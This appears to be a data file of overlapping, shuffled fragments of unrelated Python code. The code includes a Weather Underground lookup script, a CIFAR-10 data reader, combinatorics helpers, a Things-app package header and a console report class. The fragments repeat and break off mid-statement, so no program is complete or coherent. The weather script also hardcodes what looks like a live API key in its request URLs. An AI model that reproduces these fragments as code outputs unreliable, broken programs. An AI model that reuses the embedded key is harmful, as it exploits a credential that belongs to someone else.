urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/' + name) m = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/' + name) conditions =", "= sunriseHr + \":\" + sunriseMin sunsetMin = parsedAstronomy['moon_phase']['sunset']['minute'] sunsetHr = parsedAstronomy['moon_phase']['sunset']['hour'] sunset", "= parsedConditions['location']['city'] country = parsedConditions['location']['country'] temp = parsedConditions['current_observation']['temp_f'] sunriseMin = parsedAstronomy['moon_phase']['sunrise']['minute'] sunriseHr =", "with 5 keys. Assumptions: The wunderground API key is valid. ''' name =", "Exception: print (\"Unable to retrieve data: \", sys.exc_info()[0]) weatherData = None finally: return", "#def get_wunderkey() def get_data(coord): ''' Purpose: The purpose of this script is to", "sys import os #def get_wunderkey() def get_data(coord): ''' Purpose: The purpose of this", "meteorological data of a given comma-separated latitude and longitute coordinates via the wunderground", "= m.read() parsedAstronomy = json.loads(astronomy) city = parsedConditions['location']['city'] country = parsedConditions['location']['country'] temp =", "F, sunrise time, sunset time. Returns: dictionary with 5 keys. Assumptions: The wunderground", "'sunset': sunset} except Exception: print (\"Unable to retrieve data: \", sys.exc_info()[0]) weatherData =", "country, 'temp': temp, 'sunrise': sunrise, 'sunset': sunset} except Exception: print (\"Unable to retrieve", "get_wunderkey() def get_data(coord): ''' Purpose: The purpose of this script is to retrieve", "valid. ''' name = coord + '.json' try: f = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/' + name)", "parsedAstronomy['moon_phase']['sunset']['hour'] sunset = sunsetHr + \":\" + sunsetMin weatherData = {'city': city, 'country':", "= urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/' + name) conditions = f.read() parsedConditions = json.loads(conditions) astronomy = m.read()", "Returns: dictionary with 5 keys. Assumptions: The wunderground API key is valid. '''", "is to retrieve meteorological data of a given comma-separated latitude and longitute coordinates", "is valid. ''' name = coord + '.json' try: f = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/' +", "sunset = sunsetHr + \":\" + sunsetMin weatherData = {'city': city, 'country': country,", "+ sunsetMin weatherData = {'city': city, 'country': country, 'temp': temp, 'sunrise': sunrise, 'sunset':", "keys. Assumptions: The wunderground API key is valid. ''' name = coord +", "comma-separated latitude and longitute coordinates via the wunderground API. Inputs: coord: string representing", "API. Inputs: coord: string representing comma-separated coordinates. Outputs: weatherData: tuple of city, country,", "sunriseHr = parsedAstronomy['moon_phase']['sunrise']['hour'] sunrise = sunriseHr + \":\" + sunriseMin sunsetMin = parsedAstronomy['moon_phase']['sunset']['minute']", "sunsetHr = parsedAstronomy['moon_phase']['sunset']['hour'] sunset = sunsetHr + \":\" + sunsetMin weatherData = {'city':", "import sys import os #def get_wunderkey() def get_data(coord): ''' Purpose: The purpose of", "parsedConditions = json.loads(conditions) astronomy = m.read() parsedAstronomy = json.loads(astronomy) city = parsedConditions['location']['city'] country", "parsedAstronomy['moon_phase']['sunrise']['minute'] sunriseHr = parsedAstronomy['moon_phase']['sunrise']['hour'] sunrise = sunriseHr + \":\" + sunriseMin sunsetMin =", "in F, sunrise time, sunset time. Returns: dictionary with 5 keys. Assumptions: The", "via the wunderground API. Inputs: coord: string representing comma-separated coordinates. Outputs: weatherData: tuple", "city, 'country': country, 'temp': temp, 'sunrise': sunrise, 'sunset': sunset} except Exception: print (\"Unable", "= sunsetHr + \":\" + sunsetMin weatherData = {'city': city, 'country': country, 'temp':", "Assumptions: The wunderground API key is valid. ''' name = coord + '.json'", "get_data(coord): ''' Purpose: The purpose of this script is to retrieve meteorological data", "script is to retrieve meteorological data of a given comma-separated latitude and longitute", "parsedConditions['location']['city'] country = parsedConditions['location']['country'] temp = parsedConditions['current_observation']['temp_f'] sunriseMin = parsedAstronomy['moon_phase']['sunrise']['minute'] sunriseHr = parsedAstronomy['moon_phase']['sunrise']['hour']", "= f.read() parsedConditions = json.loads(conditions) astronomy = m.read() parsedAstronomy = json.loads(astronomy) city =", "urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/' + name) conditions = f.read() parsedConditions = json.loads(conditions) astronomy = m.read() parsedAstronomy", "os #def get_wunderkey() def get_data(coord): ''' Purpose: The purpose of this script is", "\":\" + sunsetMin weatherData = {'city': city, 'country': country, 'temp': temp, 'sunrise': sunrise,", "def get_data(coord): ''' Purpose: The purpose of this script is to retrieve meteorological", "country, temp in F, sunrise time, sunset time. Returns: dictionary with 5 keys.", "of this script is to retrieve meteorological data of a given comma-separated latitude", "json.loads(astronomy) city = parsedConditions['location']['city'] country = parsedConditions['location']['country'] temp = parsedConditions['current_observation']['temp_f'] sunriseMin = parsedAstronomy['moon_phase']['sunrise']['minute']", "sunrise = sunriseHr + \":\" + sunriseMin sunsetMin = parsedAstronomy['moon_phase']['sunset']['minute'] sunsetHr = parsedAstronomy['moon_phase']['sunset']['hour']", "= parsedAstronomy['moon_phase']['sunrise']['minute'] sunriseHr = parsedAstronomy['moon_phase']['sunrise']['hour'] sunrise = sunriseHr + \":\" + sunriseMin sunsetMin", "conditions = f.read() parsedConditions = json.loads(conditions) astronomy = m.read() parsedAstronomy = json.loads(astronomy) city", "\":\" + sunriseMin sunsetMin = parsedAstronomy['moon_phase']['sunset']['minute'] sunsetHr = parsedAstronomy['moon_phase']['sunset']['hour'] sunset = sunsetHr +", "coordinates via the wunderground API. Inputs: coord: string representing comma-separated coordinates. Outputs: weatherData:", "coordinates. Outputs: weatherData: tuple of city, country, temp in F, sunrise time, sunset", "name = coord + '.json' try: f = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/' + name) m =", "Outputs: weatherData: tuple of city, country, temp in F, sunrise time, sunset time.", "retrieve meteorological data of a given comma-separated latitude and longitute coordinates via the", "weatherData = {'city': city, 'country': country, 'temp': temp, 'sunrise': sunrise, 'sunset': sunset} except", "sunriseHr + \":\" + sunriseMin sunsetMin = parsedAstronomy['moon_phase']['sunset']['minute'] sunsetHr = parsedAstronomy['moon_phase']['sunset']['hour'] sunset =", "json import sys import os #def get_wunderkey() def get_data(coord): ''' Purpose: The purpose", "sunrise, 'sunset': sunset} except Exception: print (\"Unable to retrieve data: \", sys.exc_info()[0]) weatherData", "sunrise time, sunset time. Returns: dictionary with 5 keys. Assumptions: The wunderground API", "time. Returns: dictionary with 5 keys. Assumptions: The wunderground API key is valid.", "coord + '.json' try: f = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/' + name) m = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/' +", "= json.loads(conditions) astronomy = m.read() parsedAstronomy = json.loads(astronomy) city = parsedConditions['location']['city'] country =", "sunriseMin = parsedAstronomy['moon_phase']['sunrise']['minute'] sunriseHr = parsedAstronomy['moon_phase']['sunrise']['hour'] sunrise = sunriseHr + \":\" + sunriseMin", "wunderground API. Inputs: coord: string representing comma-separated coordinates. Outputs: weatherData: tuple of city,", "= urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/' + name) m = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/' + name) conditions = f.read() parsedConditions", "longitute coordinates via the wunderground API. Inputs: coord: string representing comma-separated coordinates. Outputs:", "representing comma-separated coordinates. Outputs: weatherData: tuple of city, country, temp in F, sunrise", "of city, country, temp in F, sunrise time, sunset time. Returns: dictionary with", "name) conditions = f.read() parsedConditions = json.loads(conditions) astronomy = m.read() parsedAstronomy = json.loads(astronomy)", "Purpose: The purpose of this script is to retrieve meteorological data of a", "The wunderground API key is valid. ''' name = coord + '.json' try:", "and longitute coordinates via the wunderground API. Inputs: coord: string representing comma-separated coordinates.", "import urllib2 import json import sys import os #def get_wunderkey() def get_data(coord): '''", "of a given comma-separated latitude and longitute coordinates via the wunderground API. Inputs:", "parsedConditions['current_observation']['temp_f'] sunriseMin = parsedAstronomy['moon_phase']['sunrise']['minute'] sunriseHr = parsedAstronomy['moon_phase']['sunrise']['hour'] sunrise = sunriseHr + \":\" +", "tuple of city, country, temp in F, sunrise time, sunset time. Returns: dictionary", "city, country, temp in F, sunrise time, sunset time. Returns: dictionary with 5", "temp, 'sunrise': sunrise, 'sunset': sunset} except Exception: print (\"Unable to retrieve data: \",", "m.read() parsedAstronomy = json.loads(astronomy) city = parsedConditions['location']['city'] country = parsedConditions['location']['country'] temp = parsedConditions['current_observation']['temp_f']", "sunset} except Exception: print (\"Unable to retrieve data: \", sys.exc_info()[0]) weatherData = None", "+ '.json' try: f = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/' + name) m = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/' + name)", "= parsedConditions['current_observation']['temp_f'] sunriseMin = parsedAstronomy['moon_phase']['sunrise']['minute'] sunriseHr = parsedAstronomy['moon_phase']['sunrise']['hour'] sunrise = sunriseHr + \":\"", "country = parsedConditions['location']['country'] temp = parsedConditions['current_observation']['temp_f'] sunriseMin = parsedAstronomy['moon_phase']['sunrise']['minute'] sunriseHr = parsedAstronomy['moon_phase']['sunrise']['hour'] sunrise", "5 keys. Assumptions: The wunderground API key is valid. ''' name = coord", "<gh_stars>1-10 import urllib2 import json import sys import os #def get_wunderkey() def get_data(coord):", "key is valid. ''' name = coord + '.json' try: f = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/'", "parsedAstronomy = json.loads(astronomy) city = parsedConditions['location']['city'] country = parsedConditions['location']['country'] temp = parsedConditions['current_observation']['temp_f'] sunriseMin", "parsedConditions['location']['country'] temp = parsedConditions['current_observation']['temp_f'] sunriseMin = parsedAstronomy['moon_phase']['sunrise']['minute'] sunriseHr = parsedAstronomy['moon_phase']['sunrise']['hour'] sunrise = sunriseHr", "+ name) m = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/' + name) conditions = f.read() parsedConditions = json.loads(conditions)", "given comma-separated latitude and longitute coordinates via the wunderground API. Inputs: coord: string", "urllib2 import json import sys import os #def get_wunderkey() def get_data(coord): ''' Purpose:", "except Exception: print (\"Unable to retrieve data: \", sys.exc_info()[0]) weatherData = None finally:", "this script is to retrieve meteorological data of a given comma-separated latitude and", "'sunrise': sunrise, 'sunset': sunset} except Exception: print (\"Unable to retrieve data: \", sys.exc_info()[0])", "string representing comma-separated coordinates. Outputs: weatherData: tuple of city, country, temp in F,", "name) m = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/' + name) conditions = f.read() parsedConditions = json.loads(conditions) astronomy", "'country': country, 'temp': temp, 'sunrise': sunrise, 'sunset': sunset} except Exception: print (\"Unable to", "sunset time. Returns: dictionary with 5 keys. Assumptions: The wunderground API key is", "data of a given comma-separated latitude and longitute coordinates via the wunderground API.", "'temp': temp, 'sunrise': sunrise, 'sunset': sunset} except Exception: print (\"Unable to retrieve data:" ]
[ "to_read: with open(self.data_path+'/'+t, 'rb') as f: d = cPickle.load(f) data.append(d['data']) labels.append(d['labels']) data =", "i in files for m in [pattern.search(i)] if m] data = [] labels", "cPickle.load(f) data.append(d['data']) labels.append(d['labels']) data = np.vstack(data) labels = np.hstack(labels) else: with open(self.data_path+'/test_batch') as", "re.compile('(data_batch_).') to_read = [m.group(0) for i in files for m in [pattern.search(i)] if", "open(self.data_path+'/'+t, 'rb') as f: d = cPickle.load(f) data.append(d['data']) labels.append(d['labels']) data = np.vstack(data) labels", "t in to_read: with open(self.data_path+'/'+t, 'rb') as f: d = cPickle.load(f) data.append(d['data']) labels.append(d['labels'])", "data_path self.is_training = is_training def load_data(self): files = os.listdir(self.data_path) if self.is_training is True:", "[m.group(0) for i in files for m in [pattern.search(i)] if m] data =", "labels = np.hstack(labels) else: with open(self.data_path+'/test_batch') as f: d = cPickle.load(f) data =", "pattern = re.compile('(data_batch_).') to_read = [m.group(0) for i in files for m in", "else: with open(self.data_path+'/test_batch') as f: d = cPickle.load(f) data = d['data'] labels =", "self.is_training is True: pattern = re.compile('(data_batch_).') to_read = [m.group(0) for i in files", "in [pattern.search(i)] if m] data = [] labels = [] for t in", "is_training=True): self.data_path = data_path self.is_training = is_training def load_data(self): files = os.listdir(self.data_path) if", "True: pattern = re.compile('(data_batch_).') to_read = [m.group(0) for i in files for m", "'rb') as f: d = cPickle.load(f) data.append(d['data']) labels.append(d['labels']) data = np.vstack(data) labels =", "= cPickle.load(f) data.append(d['data']) labels.append(d['labels']) data = np.vstack(data) labels = np.hstack(labels) else: with open(self.data_path+'/test_batch')", "m in [pattern.search(i)] if m] data = [] labels = [] for t", "as f: d = cPickle.load(f) data = d['data'] labels = d['labels'] return data,", "= data_path self.is_training = is_training def load_data(self): files = os.listdir(self.data_path) if self.is_training is", "= is_training def load_data(self): files = os.listdir(self.data_path) if self.is_training is True: pattern =", "data = [] labels = [] for t in to_read: with open(self.data_path+'/'+t, 'rb')", "data.append(d['data']) labels.append(d['labels']) data = np.vstack(data) labels = np.hstack(labels) else: with open(self.data_path+'/test_batch') as f:", "files for m in [pattern.search(i)] if m] data = [] labels = []", "to_read = [m.group(0) for i in files for m in [pattern.search(i)] if m]", "files = os.listdir(self.data_path) if self.is_training is True: pattern = re.compile('(data_batch_).') to_read = [m.group(0)", "is True: pattern = re.compile('(data_batch_).') to_read = [m.group(0) for i in files for", "in to_read: with open(self.data_path+'/'+t, 'rb') as f: d = cPickle.load(f) data.append(d['data']) labels.append(d['labels']) data", "re import cPickle class read_cifar10(object): def __init__(self, data_path=None, is_training=True): self.data_path = data_path self.is_training", "def load_data(self): files = os.listdir(self.data_path) if self.is_training is True: pattern = re.compile('(data_batch_).') to_read", "= [m.group(0) for i in files for m in [pattern.search(i)] if m] data", "__init__(self, data_path=None, is_training=True): self.data_path = data_path self.is_training = is_training def load_data(self): files =", "open(self.data_path+'/test_batch') as f: d = cPickle.load(f) data = d['data'] labels = d['labels'] return", "np import os import re import cPickle class read_cifar10(object): def __init__(self, data_path=None, is_training=True):", "in files for m in [pattern.search(i)] if m] data = [] labels =", "class read_cifar10(object): def __init__(self, data_path=None, is_training=True): self.data_path = data_path self.is_training = is_training def", "self.is_training = is_training def load_data(self): files = os.listdir(self.data_path) if self.is_training is True: pattern", "= [] for t in to_read: with open(self.data_path+'/'+t, 'rb') as f: d =", "labels = [] for t in to_read: with open(self.data_path+'/'+t, 'rb') as f: d", "= [] labels = [] for t in to_read: with open(self.data_path+'/'+t, 'rb') as", "os import re import cPickle class read_cifar10(object): def __init__(self, data_path=None, is_training=True): self.data_path =", "if m] data = [] labels = [] for t in to_read: with", "self.data_path = data_path self.is_training = is_training def load_data(self): files = os.listdir(self.data_path) if self.is_training", "is_training def load_data(self): files = os.listdir(self.data_path) if self.is_training is True: pattern = re.compile('(data_batch_).')", "np.vstack(data) labels = np.hstack(labels) else: with open(self.data_path+'/test_batch') as f: d = cPickle.load(f) data", "= os.listdir(self.data_path) if self.is_training is True: pattern = re.compile('(data_batch_).') to_read = [m.group(0) for", "as f: d = cPickle.load(f) data.append(d['data']) labels.append(d['labels']) data = np.vstack(data) labels = np.hstack(labels)", "numpy as np import os import re import cPickle class read_cifar10(object): def __init__(self,", "f: d = cPickle.load(f) data = d['data'] labels = d['labels'] return data, labels", "for t in to_read: with open(self.data_path+'/'+t, 'rb') as f: d = cPickle.load(f) data.append(d['data'])", "read_cifar10(object): def __init__(self, data_path=None, is_training=True): self.data_path = data_path self.is_training = is_training def load_data(self):", "import re import cPickle class read_cifar10(object): def __init__(self, data_path=None, is_training=True): self.data_path = data_path", "= np.vstack(data) labels = np.hstack(labels) else: with open(self.data_path+'/test_batch') as f: d = cPickle.load(f)", "if self.is_training is True: pattern = re.compile('(data_batch_).') to_read = [m.group(0) for i in", "m] data = [] labels = [] for t in to_read: with open(self.data_path+'/'+t,", "with open(self.data_path+'/test_batch') as f: d = cPickle.load(f) data = d['data'] labels = d['labels']", "as np import os import re import cPickle class read_cifar10(object): def __init__(self, data_path=None,", "for i in files for m in [pattern.search(i)] if m] data = []", "= re.compile('(data_batch_).') to_read = [m.group(0) for i in files for m in [pattern.search(i)]", "os.listdir(self.data_path) if self.is_training is True: pattern = re.compile('(data_batch_).') to_read = [m.group(0) for i", "f: d = cPickle.load(f) data.append(d['data']) labels.append(d['labels']) data = np.vstack(data) labels = np.hstack(labels) else:", "def __init__(self, data_path=None, is_training=True): self.data_path = data_path self.is_training = is_training def load_data(self): files", "for m in [pattern.search(i)] if m] data = [] labels = [] for", "np.hstack(labels) else: with open(self.data_path+'/test_batch') as f: d = cPickle.load(f) data = d['data'] labels", "import numpy as np import os import re import cPickle class read_cifar10(object): def", "import cPickle class read_cifar10(object): def __init__(self, data_path=None, is_training=True): self.data_path = data_path self.is_training =", "with open(self.data_path+'/'+t, 'rb') as f: d = cPickle.load(f) data.append(d['data']) labels.append(d['labels']) data = np.vstack(data)", "[] for t in to_read: with open(self.data_path+'/'+t, 'rb') as f: d = cPickle.load(f)", "data = np.vstack(data) labels = np.hstack(labels) else: with open(self.data_path+'/test_batch') as f: d =", "d = cPickle.load(f) data.append(d['data']) labels.append(d['labels']) data = np.vstack(data) labels = np.hstack(labels) else: with", "cPickle class read_cifar10(object): def __init__(self, data_path=None, is_training=True): self.data_path = data_path self.is_training = is_training", "import os import re import cPickle class read_cifar10(object): def __init__(self, data_path=None, is_training=True): self.data_path", "[] labels = [] for t in to_read: with open(self.data_path+'/'+t, 'rb') as f:", "[pattern.search(i)] if m] data = [] labels = [] for t in to_read:", "= np.hstack(labels) else: with open(self.data_path+'/test_batch') as f: d = cPickle.load(f) data = d['data']", "labels.append(d['labels']) data = np.vstack(data) labels = np.hstack(labels) else: with open(self.data_path+'/test_batch') as f: d", "data_path=None, is_training=True): self.data_path = data_path self.is_training = is_training def load_data(self): files = os.listdir(self.data_path)", "load_data(self): files = os.listdir(self.data_path) if self.is_training is True: pattern = re.compile('(data_batch_).') to_read =" ]
[ "read your Things app data.\"\"\" __author__ = \"<NAME>\" __copyright__ = \"2021 <NAME>\" __credits__", "<NAME>\" __credits__ = [\"<NAME>\"] __license__ = \"Apache License 2.0\" __version__ = \"0.1.2\" __maintainer__", "__author__ = \"<NAME>\" __copyright__ = \"2021 <NAME>\" __credits__ = [\"<NAME>\"] __license__ = \"Apache", "\"2021 <NAME>\" __credits__ = [\"<NAME>\"] __license__ = \"Apache License 2.0\" __version__ = \"0.1.2\"", "= \"Apache License 2.0\" __version__ = \"0.1.2\" __maintainer__ = \"<NAME>\" __email__ = \"<EMAIL>\"", "= \"<NAME>\" __copyright__ = \"2021 <NAME>\" __credits__ = [\"<NAME>\"] __license__ = \"Apache License", "CLI to read your Things app data.\"\"\" __author__ = \"<NAME>\" __copyright__ = \"2021", "Python 3 CLI to read your Things app data.\"\"\" __author__ = \"<NAME>\" __copyright__", "your Things app data.\"\"\" __author__ = \"<NAME>\" __copyright__ = \"2021 <NAME>\" __credits__ =", "2.0\" __version__ = \"0.1.2\" __maintainer__ = \"<NAME>\" __email__ = \"<EMAIL>\" __status__ = \"Development\"", "__license__ = \"Apache License 2.0\" __version__ = \"0.1.2\" __maintainer__ = \"<NAME>\" __email__ =", "3 CLI to read your Things app data.\"\"\" __author__ = \"<NAME>\" __copyright__ =", "<gh_stars>10-100 \"\"\"A simple Python 3 CLI to read your Things app data.\"\"\" __author__", "\"<NAME>\" __copyright__ = \"2021 <NAME>\" __credits__ = [\"<NAME>\"] __license__ = \"Apache License 2.0\"", "= \"2021 <NAME>\" __credits__ = [\"<NAME>\"] __license__ = \"Apache License 2.0\" __version__ =", "to read your Things app data.\"\"\" __author__ = \"<NAME>\" __copyright__ = \"2021 <NAME>\"", "__copyright__ = \"2021 <NAME>\" __credits__ = [\"<NAME>\"] __license__ = \"Apache License 2.0\" __version__", "data.\"\"\" __author__ = \"<NAME>\" __copyright__ = \"2021 <NAME>\" __credits__ = [\"<NAME>\"] __license__ =", "= [\"<NAME>\"] __license__ = \"Apache License 2.0\" __version__ = \"0.1.2\" __maintainer__ = \"<NAME>\"", "\"Apache License 2.0\" __version__ = \"0.1.2\" __maintainer__ = \"<NAME>\" __email__ = \"<EMAIL>\" __status__", "__credits__ = [\"<NAME>\"] __license__ = \"Apache License 2.0\" __version__ = \"0.1.2\" __maintainer__ =", "app data.\"\"\" __author__ = \"<NAME>\" __copyright__ = \"2021 <NAME>\" __credits__ = [\"<NAME>\"] __license__", "\"\"\"A simple Python 3 CLI to read your Things app data.\"\"\" __author__ =", "simple Python 3 CLI to read your Things app data.\"\"\" __author__ = \"<NAME>\"", "[\"<NAME>\"] __license__ = \"Apache License 2.0\" __version__ = \"0.1.2\" __maintainer__ = \"<NAME>\" __email__", "License 2.0\" __version__ = \"0.1.2\" __maintainer__ = \"<NAME>\" __email__ = \"<EMAIL>\" __status__ =", "Things app data.\"\"\" __author__ = \"<NAME>\" __copyright__ = \"2021 <NAME>\" __credits__ = [\"<NAME>\"]" ]
[ "from .impl import ( BrokerHandler, ) from .ports import ( BrokerHandlerService, BrokerPort, )" ]
[ "= \"<NAME>\" __date__ = \"2015-02-20\" def factorial(n): if n == 0: return 1", "result if __name__ == \"__main__\": print(\"Permutations of ['a','b','c']:\", permutations(['a','b','c'])) print(\"Subsets of ['a','b','c']:\", subsets(['a','b','c']))", "rest) _subsets((), lst) return result if __name__ == \"__main__\": print(\"Permutations of ['a','b','c']:\", permutations(['a','b','c']))", "_subsets(current, rest): if rest == []: result.append(current) return (first, *rest) = rest _subsets(current", "+ (first,), rest) _subsets(current, rest) _subsets((), lst) return result if __name__ == \"__main__\":", "(first,), rest) _subsets(current, rest) _subsets((), lst) return result if __name__ == \"__main__\": print(\"Permutations", "permute((), lst) return result def subsets(lst): result = [] def _subsets(current, rest): if", "0: return 1 else: return n * factorial(n-1) def permutations(lst): result = []", "rest == []: result.append(current) return for r in rest: permute(current + (r,), [i", "__author__ = \"<NAME>\" __date__ = \"2015-02-20\" def factorial(n): if n == 0: return", "def factorial(n): if n == 0: return 1 else: return n * factorial(n-1)", "in rest: permute(current + (r,), [i for i in rest if i !=", "[] def permute(current, rest): if rest == []: result.append(current) return for r in", "*rest) = rest _subsets(current + (first,), rest) _subsets(current, rest) _subsets((), lst) return result", "_subsets((), lst) return result if __name__ == \"__main__\": print(\"Permutations of ['a','b','c']:\", permutations(['a','b','c'])) print(\"Subsets", "subsets(lst): result = [] def _subsets(current, rest): if rest == []: result.append(current) return", "rest): if rest == []: result.append(current) return for r in rest: permute(current +", "result.append(current) return (first, *rest) = rest _subsets(current + (first,), rest) _subsets(current, rest) _subsets((),", "r in rest: permute(current + (r,), [i for i in rest if i", "!= r]) permute((), lst) return result def subsets(lst): result = [] def _subsets(current,", "i in rest if i != r]) permute((), lst) return result def subsets(lst):", "1 else: return n * factorial(n-1) def permutations(lst): result = [] def permute(current,", "factorial(n-1) def permutations(lst): result = [] def permute(current, rest): if rest == []:", "\"<NAME>\" __date__ = \"2015-02-20\" def factorial(n): if n == 0: return 1 else:", "= [] def permute(current, rest): if rest == []: result.append(current) return for r", "functions. \"\"\" __author__ = \"<NAME>\" __date__ = \"2015-02-20\" def factorial(n): if n ==", "return n * factorial(n-1) def permutations(lst): result = [] def permute(current, rest): if", "== []: result.append(current) return for r in rest: permute(current + (r,), [i for", "\"\"\" Various combinatorics functions. \"\"\" __author__ = \"<NAME>\" __date__ = \"2015-02-20\" def factorial(n):", "in rest if i != r]) permute((), lst) return result def subsets(lst): result", "return result def subsets(lst): result = [] def _subsets(current, rest): if rest ==", "* factorial(n-1) def permutations(lst): result = [] def permute(current, rest): if rest ==", "[] def _subsets(current, rest): if rest == []: result.append(current) return (first, *rest) =", "+ (r,), [i for i in rest if i != r]) permute((), lst)", "def subsets(lst): result = [] def _subsets(current, rest): if rest == []: result.append(current)", "def permutations(lst): result = [] def permute(current, rest): if rest == []: result.append(current)", "\"2015-02-20\" def factorial(n): if n == 0: return 1 else: return n *", "Various combinatorics functions. \"\"\" __author__ = \"<NAME>\" __date__ = \"2015-02-20\" def factorial(n): if", "[]: result.append(current) return for r in rest: permute(current + (r,), [i for i", "rest == []: result.append(current) return (first, *rest) = rest _subsets(current + (first,), rest)", "return result if __name__ == \"__main__\": print(\"Permutations of ['a','b','c']:\", permutations(['a','b','c'])) print(\"Subsets of ['a','b','c']:\",", "r]) permute((), lst) return result def subsets(lst): result = [] def _subsets(current, rest):", "factorial(n): if n == 0: return 1 else: return n * factorial(n-1) def", "= rest _subsets(current + (first,), rest) _subsets(current, rest) _subsets((), lst) return result if", "[]: result.append(current) return (first, *rest) = rest _subsets(current + (first,), rest) _subsets(current, rest)", "n * factorial(n-1) def permutations(lst): result = [] def permute(current, rest): if rest", "if i != r]) permute((), lst) return result def subsets(lst): result = []", "= \"2015-02-20\" def factorial(n): if n == 0: return 1 else: return n", "return (first, *rest) = rest _subsets(current + (first,), rest) _subsets(current, rest) _subsets((), lst)", "result def subsets(lst): result = [] def _subsets(current, rest): if rest == []:", "i != r]) permute((), lst) return result def subsets(lst): result = [] def", "__date__ = \"2015-02-20\" def factorial(n): if n == 0: return 1 else: return", "rest): if rest == []: result.append(current) return (first, *rest) = rest _subsets(current +", "[i for i in rest if i != r]) permute((), lst) return result", "= [] def _subsets(current, rest): if rest == []: result.append(current) return (first, *rest)", "rest) _subsets(current, rest) _subsets((), lst) return result if __name__ == \"__main__\": print(\"Permutations of", "(first, *rest) = rest _subsets(current + (first,), rest) _subsets(current, rest) _subsets((), lst) return", "def permute(current, rest): if rest == []: result.append(current) return for r in rest:", "for r in rest: permute(current + (r,), [i for i in rest if", "if rest == []: result.append(current) return (first, *rest) = rest _subsets(current + (first,),", "== 0: return 1 else: return n * factorial(n-1) def permutations(lst): result =", "def _subsets(current, rest): if rest == []: result.append(current) return (first, *rest) = rest", "rest _subsets(current + (first,), rest) _subsets(current, rest) _subsets((), lst) return result if __name__", "if n == 0: return 1 else: return n * factorial(n-1) def permutations(lst):", "else: return n * factorial(n-1) def permutations(lst): result = [] def permute(current, rest):", "permutations(lst): result = [] def permute(current, rest): if rest == []: result.append(current) return", "return 1 else: return n * factorial(n-1) def permutations(lst): result = [] def", "\"\"\" __author__ = \"<NAME>\" __date__ = \"2015-02-20\" def factorial(n): if n == 0:", "_subsets(current + (first,), rest) _subsets(current, rest) _subsets((), lst) return result if __name__ ==", "result = [] def _subsets(current, rest): if rest == []: result.append(current) return (first,", "lst) return result def subsets(lst): result = [] def _subsets(current, rest): if rest", "rest: permute(current + (r,), [i for i in rest if i != r])", "(r,), [i for i in rest if i != r]) permute((), lst) return", "combinatorics functions. \"\"\" __author__ = \"<NAME>\" __date__ = \"2015-02-20\" def factorial(n): if n", "result.append(current) return for r in rest: permute(current + (r,), [i for i in", "n == 0: return 1 else: return n * factorial(n-1) def permutations(lst): result", "rest if i != r]) permute((), lst) return result def subsets(lst): result =", "if rest == []: result.append(current) return for r in rest: permute(current + (r,),", "_subsets(current, rest) _subsets((), lst) return result if __name__ == \"__main__\": print(\"Permutations of ['a','b','c']:\",", "== []: result.append(current) return (first, *rest) = rest _subsets(current + (first,), rest) _subsets(current,", "permute(current, rest): if rest == []: result.append(current) return for r in rest: permute(current", "for i in rest if i != r]) permute((), lst) return result def", "lst) return result if __name__ == \"__main__\": print(\"Permutations of ['a','b','c']:\", permutations(['a','b','c'])) print(\"Subsets of", "return for r in rest: permute(current + (r,), [i for i in rest", "result = [] def permute(current, rest): if rest == []: result.append(current) return for", "permute(current + (r,), [i for i in rest if i != r]) permute(()," ]
[ "if the url is vulnerable \"\"\" if result: print(\"{}{}{}\".format(colours.FAIL, msg, colours.ENDC)) else: print(msg)", "def __init__(self, msg, result=False): \"\"\" Handles the message and report it back to", "the message and report it back to console :param msg : String type", "back to console :param msg : String type message :param result : the", "<reponame>Marzooq13579/Hack-Gadgets from lib.colour import colours class Report: def __init__(self, msg, result=False): \"\"\" Handles", "result : the boolean object indicating if the url is vulnerable \"\"\" if", "to console :param msg : String type message :param result : the boolean", "colours class Report: def __init__(self, msg, result=False): \"\"\" Handles the message and report", "boolean object indicating if the url is vulnerable \"\"\" if result: print(\"{}{}{}\".format(colours.FAIL, msg,", ": String type message :param result : the boolean object indicating if the", "and report it back to console :param msg : String type message :param", "message :param result : the boolean object indicating if the url is vulnerable", "\"\"\" Handles the message and report it back to console :param msg :", "from lib.colour import colours class Report: def __init__(self, msg, result=False): \"\"\" Handles the", "it back to console :param msg : String type message :param result :", ": the boolean object indicating if the url is vulnerable \"\"\" if result:", "String type message :param result : the boolean object indicating if the url", "the boolean object indicating if the url is vulnerable \"\"\" if result: print(\"{}{}{}\".format(colours.FAIL,", "indicating if the url is vulnerable \"\"\" if result: print(\"{}{}{}\".format(colours.FAIL, msg, colours.ENDC)) else:", "Report: def __init__(self, msg, result=False): \"\"\" Handles the message and report it back", "report it back to console :param msg : String type message :param result", "result=False): \"\"\" Handles the message and report it back to console :param msg", "msg : String type message :param result : the boolean object indicating if", "__init__(self, msg, result=False): \"\"\" Handles the message and report it back to console", "import colours class Report: def __init__(self, msg, result=False): \"\"\" Handles the message and", "lib.colour import colours class Report: def __init__(self, msg, result=False): \"\"\" Handles the message", "object indicating if the url is vulnerable \"\"\" if result: print(\"{}{}{}\".format(colours.FAIL, msg, colours.ENDC))", ":param result : the boolean object indicating if the url is vulnerable \"\"\"", "console :param msg : String type message :param result : the boolean object", "Handles the message and report it back to console :param msg : String", "class Report: def __init__(self, msg, result=False): \"\"\" Handles the message and report it", "message and report it back to console :param msg : String type message", ":param msg : String type message :param result : the boolean object indicating", "type 